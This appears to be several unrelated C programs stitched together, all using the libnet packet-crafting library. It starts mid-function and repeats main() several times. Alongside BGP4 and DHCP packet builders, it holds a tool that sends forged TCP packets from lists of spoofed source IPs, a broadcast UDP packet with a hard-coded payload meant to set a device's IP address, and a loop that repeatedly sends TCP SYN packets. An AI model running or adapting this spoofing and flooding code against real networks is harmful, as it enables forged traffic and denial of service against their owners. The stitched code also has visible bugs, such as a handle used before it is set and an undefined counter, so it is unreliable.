t = libnet_build_bgp4_header(
marker, /* marker */
length, /* length */
LIBNET_BGP4_UPDATE, /* message type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build BGP4 header: %s\n", libnet_geterror(l));
goto bad;
}
length+=LIBNET_TCP_H;
t = libnet_build_tcp(
0x6666, /* source port */
179, /* destination port */
0x01010101, /* sequence number */
0x02020202, /* acknowledgement num */
TH_SYN, /* control flags */
32767, /* window size */
0, /* checksum */
0, /* urgent pointer */
length, /* TCP packet size */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}
length+=LIBNET_IPV4_H;
t = libnet_build_ipv4(
length, /* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte TCP packet; check the wire.\n", c);
}
if (flag_w) free(withdraw_rt);
if (flag_a) free(attr);
if (flag_i) free(info);
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
if (flag_w) free(withdraw_rt);
if (flag_a) free(attr);
if (flag_i) free(info);
libnet_destroy(l);
return (EXIT_FAILURE);
}
int
main(int argc, char *argv[])
{
char *intf;
u_long src_ip, options_len, orig_len;
int i;
libnet_t *l;
libnet_ptag_t t;
libnet_ptag_t ip;
libnet_ptag_t udp;
libnet_ptag_t dhcp;
struct libnet_ether_addr *ethaddr;
struct libnet_stats ls;
char errbuf[LIBNET_ERRBUF_SIZE];
u_char options_req[] = { LIBNET_DHCP_SUBNETMASK , LIBNET_DHCP_BROADCASTADDR , LIBNET_DHCP_TIMEOFFSET , LIBNET_DHCP_ROUTER , LIBNET_DHCP_DOMAINNAME , LIBNET_DHCP_DNS , LIBNET_DHCP_HOSTNAME };
u_char *options;
u_char enet_dst[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
u_char *tmp;
// have to specify interface
if (argc != 2)
usage(argv[0]);
intf = argv[1];
l = libnet_init(
LIBNET_LINK, // injection type
intf, // network interface
errbuf); // errbuf
if (!l)
{
fprintf(stderr, "libnet_init: %s", errbuf);
exit(EXIT_FAILURE);
}
else {
src_ip = libnet_get_ipaddr4(l);;
if ((ethaddr = libnet_get_hwaddr(l)) == NULL)
{
fprintf(stderr, "libnet_get_hwaddr: %s\n", libnet_geterror(l));
exit(EXIT_FAILURE);
}
printf("ip addr : %s\n", libnet_addr2name4(src_ip, LIBNET_DONT_RESOLVE));
printf("eth addr : ");
for (i = 0; i < 6; i++) {
printf("%x", ethaddr->ether_addr_octet[i]);
if (i != 5) {
printf(":");
}
}
printf("\n");
// build options packet
i = 0;
options_len = 3; // update total payload size
// we are a discover packet
options = malloc(3);
options[i++] = LIBNET_DHCP_MESSAGETYPE; // type
options[i++] = 1; // len
options[i++] = LIBNET_DHCP_MSGDISCOVER; // data
orig_len = options_len;
options_len += sizeof(options_req) + 2; // update total payload size
// workaround for realloc on old machines
// options = realloc(options, options_len); // resize options buffer
tmp = malloc(options_len);
memcpy(tmp, options, orig_len);
free(options);
options = tmp;
// we are going to request some parameters
options[i++] = LIBNET_DHCP_PARAMREQUEST; // type
options[i++] = sizeof(options_req); // len
memcpy(options + i, options_req, sizeof(options_req)); // data
i += sizeof(options_req);
// if we have an ip already, let's request it.
if (src_ip)
{
orig_len = options_len;
options_len += 2 + sizeof(src_ip);
// workaround for realloc on old machines
// options = realloc(options, options_len);
tmp = malloc(options_len);
memcpy(tmp, options, orig_len);
free(options);
options = tmp;
options[i++] = LIBNET_DHCP_DISCOVERADDR; // type
options[i++] = sizeof(src_ip); // len
memcpy(options + i, (char *)&src_ip, sizeof(src_ip));// data
i += sizeof(src_ip);
}
// end our options packet
options[i] = LIBNET_DHCP_END;
// make sure we are at least the minimum length, if not fill
// this could go in libnet, but we will leave it in the app for now
if (options_len + LIBNET_DHCPV4_H < LIBNET_BOOTP_MIN_LEN)
{
orig_len = options_len;
options_len = LIBNET_BOOTP_MIN_LEN - LIBNET_DHCPV4_H;
// workaround for realloc on old machines
// options = realloc(options, options_len);
tmp = malloc(options_len);
memcpy(tmp, options, orig_len);
free(options);
options = tmp;
memset(options + i, 0, options_len - i);
}
// the goodies are here
dhcp = libnet_build_dhcpv4(
LIBNET_DHCP_REQUEST, // opcode
1, // hardware type
6, // hardware address length
0, // hop count
0xdeadbeef, // transaction id
0, // seconds since bootstrap
0x8000, // flags
0, // client ip
0, // your ip
0, // server ip
0, // gateway ip
ethaddr->ether_addr_octet, // client hardware addr
NULL, // server host name
NULL, // boot file
options, // dhcp options stuck in payload since it is dynamic
options_len, // length of options
l, // libnet handle
0); // libnet id
// wrap it
udp = libnet_build_udp(
68, // source port
67, // destination port
LIBNET_UDP_H + LIBNET_DHCPV4_H + options_len, // packet size
0, // checksum
NULL, // payload
0, // payload size
l, // libnet handle
0); // libnet id
// hook me up with some ipv4
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_UDP_H + LIBNET_DHCPV4_H
+ options_len, // length
0x10, // TOS
0, // IP ID
0, // IP Frag
16, // TTL
IPPROTO_UDP, // protocol
0, // checksum
src_ip, // src ip
inet_addr("255.255.255.255"), // destination ip
NULL, // payload
0, // payload size
l, // libnet handle
0); // libnet id
// we can just autobuild since we arent doing anything tricky
t = libnet_autobuild_ethernet(
enet_dst, // ethernet destination
ETHERTYPE_IP, // protocol type
l); // libnet handle
// write to the wire
if (libnet_write(l) == -1)
{
fprintf(stderr, " %s: libnet_write: %s\n", argv[0],
strerror(errno));
exit(EXIT_FAILURE);
}
// fill and print stats
libnet_stats(l, &ls);
fprintf(stderr, "Packets sent: %ld\n"
"Packet errors: %ld\n"
"Bytes written: %ld\n",
ls.packets_sent, ls.packet_errors, ls.bytes_written);
libnet_destroy(l);
// free mem
free(options);
exit(0);
}
exit(0);
}
int main(int argc, char *argv[])
{
int c, i;
u_char *cp;
libnet_t *l;
libnet_ptag_t ip;
libnet_ptag_t tcp;
struct libnet_stats ls;
u_long nround;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
u_char opt[20];
char errbuf[LIBNET_ERRBUF_SIZE];
FILE *dmf, *nsf, *srcf;
char *dms[MAXLINES], *nss[MAXLINES], *srcs[MAXLINES];
int pay_s[MAXLINES];
char *dmfn = "kw.txt";
char *nsfn = "dst.txt";
char *srcfn = "src.txt";
char *paybuf, *pp;
int jd = 0;
int jn = 0;
int js = 0;
int kd, kn;
u_char bt;
char lb[80];
char linebuf[80];
char payld[100], tpayld[100];
/* Read the keywords, dest IPs, src IPs , and construct http payload */
if( (dmf = fopen(dmfn, "r")) == NULL) {
fprintf(stderr, "Error opening key word file %s \n", dmfn);
exit(1);
} /* end if */
if( (nsf = fopen(nsfn, "r")) == NULL) {
fprintf(stderr, "Error opening file %s \n", nsfn);
exit(1);
} /* end if */
if( (srcf = fopen(srcfn, "r")) == NULL) {
fprintf(stderr, "Error opening file %s \n", srcfn);
exit(1);
} /* end if */
printf("Reading key words ...\n");
while ((jd < MAXLINES) && (fgets(lb, 80, dmf)!=0) ) {
kd = 0;
kn = 0;
while (lb[kd] != '\0') { /* get rid of space and CR */
linebuf[kn++] = lb[kd++];
} /* end while */
linebuf[kn] = '\0';
paybuf = linebuf;
if (kn != 0) { /* not empty line */
/* convert line into http query payload */
dms[jd] = (char *)malloc(strlen(paybuf)+1); /* alloc mem */
strcpy(dms[jd], paybuf);
pay_s[jd] = strlen(dms[jd]);
/* ===== for message body debugging */
for (kn=0; kn < pay_s[jd]; kn++) {
bt = *(dms[jd] + kn);
printf(" %02X", bt);
}
printf("\n");
/*=== */
jd++;
} /* end if */
} /* end while */
printf("Total http requests: %d\n", jd);
fclose(dmf);
js=0;
printf("Reading spoofed source IPs ... \n");
while ((js < MAXLINES) && (fgets(lb, 80, srcf)!=0) ) {
kd = 0;
kn = 0;
while (lb[kd] != '\0') { /* get rid of space and CR */
if ((lb[kd] != ' ') && (lb[kd] != '\n')) {
linebuf[kn] = lb[kd];
kn++;
} /* end if */
kd++;
} /* end while */
linebuf[kn] = '\0';
if (kn != 0) { /* not empty line */
srcs[js] = (char *)malloc(strlen(linebuf)+1);
strcpy(srcs[js++], linebuf);
/* printf("%s\n", srcs[js-1]); */
} /* end if */
} /* end while */
printf("Total source IPs: %d\n", js);
fclose(srcf);
jn = 0;
printf("Reading dst IPs ... \n");
while ((jn < MAXLINES) && (fgets(lb, 80, nsf)!=0) ) {
kd = 0;
kn = 0;
while (lb[kd] != '\0') { /* get rid of space and CR */
if ((lb[kd] != ' ') && (lb[kd] != '\n')) {
linebuf[kn] = lb[kd];
kn++;
} /* end if */
kd++;
} /* end while */
linebuf[kn] = '\0';
if (kn != 0) { /* not empty line */
nss[jn] = (char *)malloc(strlen(linebuf)+1);
strcpy(nss[jn++], linebuf);
/* printf("%s\n", nss[jn-1]); */
} /* end if */
} /* end while */
printf("Total dst IPs: %d\n", jn);
fclose(nsf);
nround = 0;
/* while(1) { non-stop sending ... */
/* Initialize the library. Root priviledges are required. */
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* errbuf */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
libnet_seed_prand(l);
tcp = 0;
ip = 0;
for(kd=0; kd < jd; kd++) { /* loop over all http reqs */
for(kn=0; kn < jn; kn++) { /* loop over all dst IPs */
if ((dst_ip = libnet_name2addr4(l, nss[kn], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "Bad dest IP address: %s\n", nss[kn]);
exit(EXIT_FAILURE);
} /* end if */
/* printf("feeding %s for keyword %s ...\n", nss[kn], dms[kd]); */
i = (int)(libnet_get_prand(LIBNET_PRu16)/65535.0*(js-1)); /* Randsrc ip */
src_ip = libnet_name2addr4(l, srcs[i], LIBNET_RESOLVE); /* src ip */
printf("using source IP %s ...\n", srcs[i]);
src_prt = libnet_get_prand(LIBNET_PRu16); /* Random source port */
dst_prt = 1234; /* http */
/* Building TCP */
tcp = libnet_build_tcp(
src_prt, /* source port */
dst_prt, /* destination port */
libnet_get_prand(LIBNET_PRu32),
libnet_get_prand(LIBNET_PRu32),
0x18, /* (PSH, ACK) */
libnet_get_prand(LIBNET_PRu16), /* window size */
0, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H + pay_s[kd], /* packet length */
dms[kd], /* payload */
pay_s[kd], /* payload size */
l, /* libnet handle */
tcp); /* libnet id */
if (tcp == -1) {
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}
/* Building IP */
ip = libnet_build_ipv4(
LIBNET_IPV4_H + pay_s[kd] + LIBNET_TCP_H, /* length */
0x00, /* TOS */
0, /* IP ID */
0x4000, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip,
dst_ip,
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
ip); /* libnet id */
if (ip == -1) {
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
/* Write it to the wire. */
c = libnet_write(l);
if (c == -1) {
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
} else {
/* printf("Wrote %d byte TCP packet; check the wire.\n", c); */
}
usleep(20); /* slow down to conserve bandwidth */
} /* end for */
} /* end for */
libnet_stats(l, &ls);
fprintf(stderr, "Packets sent: %ld\n"
"Packet errors: %ld\n"
"Bytes written: %ld\n",
ls.packets_sent, ls.packet_errors, ls.bytes_written);
libnet_destroy(l);
nround++;
printf("====== Round %ld sent ================\n", nround);
/* } end of while loop */
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
int main(int argc, char *argv[])
{
int c, i;
u_char *cp;
libnet_t *l;
libnet_ptag_t ip;
libnet_ptag_t tcp;
struct libnet_stats ls;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
u_char opt[20];
char errbuf[LIBNET_ERRBUF_SIZE];
FILE *dmf;
char *dms;
int pay_s;
char *dmfn = "kw.txt";
char *paybuf, *pp;
u_char bt;
char linebuf[MAXTEXT];
/* Initialize the library. Root priviledges are required. */
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* errbuf */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
libnet_seed_prand(l);
tcp = 0;
ip = 0;
dst_ip = libnet_get_prand(LIBNET_PRu32);
src_ip = libnet_get_prand(LIBNET_PRu32);
src_prt = libnet_get_prand(LIBNET_PRu16);
dst_prt = 80; /* http */
while ((c = getopt(argc, argv, "d:s:p:f:")) != EOF)
{
switch (c)
{
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 's':
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'p':
dst_prt = (u_short)atoi(optarg);
printf("Dest port: %d\n", dst_prt);
break;
case 'f':
dmfn = optarg;
printf("File name: %s\n", dmfn);
break;
default:
exit(EXIT_FAILURE);
}
}
/* Read the keywords, dest IPs, src IPs , and construct http payload */
if( (dmf = fopen(dmfn, "r")) == NULL) {
fprintf(stderr, "Error opening the content file %s \n", dmfn);
exit(1);
} /* end if */
printf("Reading content ...\n");
i = 0;
while ((i < MAXTEXT) && ( (c=fgetc(dmf)) != EOF ) )
{
linebuf[i++] = c;
}
fclose(dmf);
linebuf[i] = '\0';
paybuf = linebuf;
dms = (char *)malloc(strlen(paybuf)+1); /* alloc mem */
strcpy(dms, paybuf);
pay_s = strlen(dms);
/* ===== for message body debugging */
printf("Content read:\n");
for (i=0; i < pay_s; i++) {
bt = *(dms + i);
printf(" %02X", bt);
}
printf("\n");
/*=== */
/* Building TCP */
tcp = libnet_build_tcp(
src_prt, /* source port */
dst_prt, /* destination port */
libnet_get_prand(LIBNET_PRu32),
libnet_get_prand(LIBNET_PRu32),
0x18, /* (PSH, ACK) */
libnet_get_prand(LIBNET_PRu16), /* window size */
0, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H + pay_s, /* packet length */
dms, /* payload */
pay_s, /* payload size */
l, /* libnet handle */
tcp); /* libnet id */
if (tcp == -1) {
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}
/* Building IP */
ip = libnet_build_ipv4(
LIBNET_IPV4_H + pay_s + LIBNET_TCP_H, /* length */
0x00, /* TOS */
0, /* IP ID */
0x4000, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip,
dst_ip,
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
ip); /* libnet id */
if (ip == -1) {
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
/* Write it to the wire. */
c = libnet_write(l);
if (c == -1) {
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
} else {
/* printf("Wrote %d byte TCP packet; check the wire.\n", c); */
}
/* usleep(20); slow down to conserve bandwidth */
libnet_stats(l, &ls);
fprintf(stderr, "Packets sent: %ld\n"
"Packet errors: %ld\n"
"Bytes written: %ld\n",
ls.packets_sent, ls.packet_errors, ls.bytes_written);
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
int main (int argc, char *argv[]) {
libnet_t *p;
libnet_ptag_t ip, udp, ipoptions, ether;
u_long srcip, dstip;
u_short srcport = 62976, dstport = 62976, x;
signed int ret;
char errbuff[LIBNET_ERRBUF_SIZE], ipopt[21];
int len;
int8_t *macdst = "ff:ff:ff:ff:ff:ff";
u_int8_t *macdest;
char payload[128] = "\xfd\xfd\x00\x04\x00\x03\x00\x0f\x3d\x56\x97\x07"
"\x0a\x00\x32\x32" /* ip address to set too */
"\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00";
u_short payloadlen = strlen(payload);
srcip = libnet_get_ipaddr4(p); /* mod to spoof */
dstip = libnet_name2addr4(p,"255.255.255.255",LIBNET_DONT_RESOLVE); /* 255.255.255.255 */
udp = ip = ether = ipoptions = 0;
if ( (macdest = libnet_hex_aton(macdst,&len)) == NULL) {
fprintf(stderr,"cant get mac str - %s",libnet_geterror(p));
exit (1);
}
if ( (p = libnet_init (LIBNET_LINK, NULL, errbuff)) == NULL) {
fprintf(stderr,"cant init() - %s\n",errbuff);
exit (1);
}
if ( (udp = libnet_build_udp(srcport,dstport,LIBNET_UDP_H + payloadlen,0,payload,payloadlen,p,udp)) == -1) {
fprintf(stderr,"cant build udp - %s\n",libnet_geterror(p));
exit (1);
}
for (x=0;x<20;x++) {
ipopt[x] = libnet_get_prand(LIBNET_PR2);
}
ipoptions = libnet_build_ipv4_options (ipopt,20,p,ipoptions);
if ( (ip = libnet_build_ipv4 (LIBNET_IPV4_H + 20 + payloadlen +
LIBNET_UDP_H,0,250,0,128,IPPROTO_UDP,0,srcip,dstip,payload,payloadlen,p,ip)) == -1) {
fprintf(stderr,"cant build ipv4 - %s\n",libnet_geterror(p));
exit (1);
}
if ((ether = libnet_build_ethernet (macdest,macdest,ETHERTYPE_IP,NULL,0,p,ether)) == -1) {
fprintf(stderr,"cant build ether - %s",libnet_geterror(p));
exit (1);
}
//libnet_diag_dump_pblock(p);
if ( (ret = libnet_write(p)) == -1) {
fprintf(stderr,"%s\n",libnet_geterror(p));
}
free(macdest); /* hex_aton malloc's - see libnet doco */
libnet_destroy(p);
return 0;
}
int
main(int argc, char *argv[])
{
int c;
libnet_t *l;
u_long src_ip, dst_ip, length;
libnet_ptag_t t = 0;
char errbuf[LIBNET_ERRBUF_SIZE];
u_char *payload = NULL;
u_long payload_s = 0;
u_char marker[LIBNET_BGP4_MARKER_SIZE];
printf("libnet 1.1 packet shaping: BGP4 open + payload[raw]\n");
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
src_ip = 0;
dst_ip = 0;
memset(marker, 0x1, LIBNET_BGP4_MARKER_SIZE);
while ((c = getopt(argc, argv, "d:s:t:m:p:S:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then seperate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 's':
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'm':
memcpy(marker, optarg, LIBNET_BGP4_MARKER_SIZE);
break;
case 'p':
payload = (u_char *)optarg;
break;
case 'S':
payload_s = atoi(optarg);
break;
default:
exit(EXIT_FAILURE);
}
}
if (!src_ip || !dst_ip)
{
usage(argv[0]);
goto bad;
}
if (payload_s && !payload)
{
payload = (u_char *)malloc(payload_s);
if (!payload)
{
printf("memory allocation failed (%ld bytes requested)\n", payload_s);
goto bad;
}
memset(payload, 0x41, payload_s);
}
if (payload && !payload_s)
{
payload_s = strlen((char *)payload);
}
length = LIBNET_BGP4_OPEN_H + payload_s;
t = libnet_build_bgp4_open(
4, /* version */
0x3412, /* my AS */
0x7856, /* hold time */
0xefbeadde, /* BGP id */
payload_s, /* options length */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build BGP4 open header: %s\n", libnet_geterror(l));
goto bad;
}
length+=LIBNET_BGP4_HEADER_H;
t = libnet_build_bgp4_header(
marker, /* marker */
length, /* length */
LIBNET_BGP4_OPEN, /* message type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build BGP4 header: %s\n", libnet_geterror(l));
goto bad;
}
length+=LIBNET_TCP_H;
t = libnet_build_tcp(
0x6666, /* source port */
179, /* destination port */
0x01010101, /* sequence number */
0x02020202, /* acknowledgement num */
TH_SYN, /* control flags */
32767, /* window size */
0, /* checksum */
0, /* urgent pointer */
length, /* TCP packet size */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}
length+=LIBNET_IPV4_H;
t = libnet_build_ipv4(
length, /* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte TCP packet; check the wire.\n", c);
}
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
void send_packets(libnet_t *lnet_handle,
u_int32_t src,
u_int32_t dst,
u_short src_port,
u_short dst_port,
unsigned int amount,
useconds_t interval)
{
libnet_ptag_t tcp = LIBNET_PTAG_INITIALIZER,
ip = LIBNET_PTAG_INITIALIZER;
while (*count < amount)
{
tcp = libnet_build_tcp(
src_port,
dst_port,
0,
0,
TH_SYN,
1024,
0,
0,
LIBNET_TCP_H,
NULL,
0,
lnet_handle,
tcp);
ip = libnet_build_ipv4(
LIBNET_TCP_H + LIBNET_IPV4_H, /* length */
0, /* TOS */
0, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src, /* source IP */
dst, /* destination IP */
NULL, /* payload */
0, /* payload size */
lnet_handle, /* libnet context */
ip); /* ptag */
if (ip == -1)
{
fprintf(stderr,
"Can't build IP: %s.\n",
libnet_geterror(lnet_handle));
exit(EXIT_FAILURE);
}
int res = libnet_write(lnet_handle);
if (res == -1)
{
fprintf(stderr,
"libnet_write: %s.\n",
libnet_geterror(lnet_handle));
exit(EXIT_FAILURE);
}
if (interval > 0)
usleep(interval);
}
}
